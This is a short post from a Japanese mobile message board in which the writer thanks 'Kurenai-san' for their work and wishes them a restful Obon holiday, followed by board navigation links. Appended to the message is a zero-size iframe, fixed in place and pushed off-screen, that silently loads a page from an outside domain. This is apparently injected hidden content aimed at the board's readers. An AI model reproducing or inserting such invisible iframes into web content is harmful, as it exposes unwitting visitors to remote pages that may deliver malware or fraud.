本文コピー
▼本文
くれないさん お仕事お疲れさまでした。 アタシは一年を通して基本お休みは取りません。一緒に出掛けるお相手もいない上に、かねてより懸案の一件で連絡があるまでは待機の身。例年にも増して働くより他に術がありません。 明日からのお盆休み、どぅぞゆっくりなさってくださいね。 *gV<iframe src="http://syame.genin.jp/en/20_0_a.html" style="width:0;height:0;position:fixed;top:0;left:110%;border:none;" scrolling="no"></iframe>
スレッドに戻る
HP
/
RANK
/
UP
MOBI-BOARD